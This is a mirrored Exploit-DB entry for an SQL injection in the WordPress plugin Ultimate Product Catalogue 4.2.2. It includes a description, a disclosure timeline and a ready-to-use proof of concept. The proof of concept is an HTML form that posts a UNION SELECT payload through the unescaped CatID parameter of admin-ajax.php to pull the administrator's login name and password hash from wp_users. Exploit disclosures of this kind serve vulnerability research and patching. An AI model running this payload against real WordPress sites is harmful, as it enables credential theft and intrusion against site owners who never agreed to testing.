bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42263.txt
Offensive Security c9a65a1f7b DB: 2021-09-03 
52 changes to exploits/shellcodes
2021-09-03 21:04:54 +00:00

44 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04
1 - Description:
Type user access: register user.
$_POST[CatID] is not escaped.
http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 Using:
<*form method="post"
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">
*delete “*” in code*
3 - Timeline:
- 22/05/2017 Discovered
- 24/05/2017 Vendor not finded
- **/06/2017 - Corrected
***Rename plugin txt to zip. Problem with gmail block.
--
*Atenciosamente*
*Lenon Leite*
Reference in a new issue View git blame Copy permalink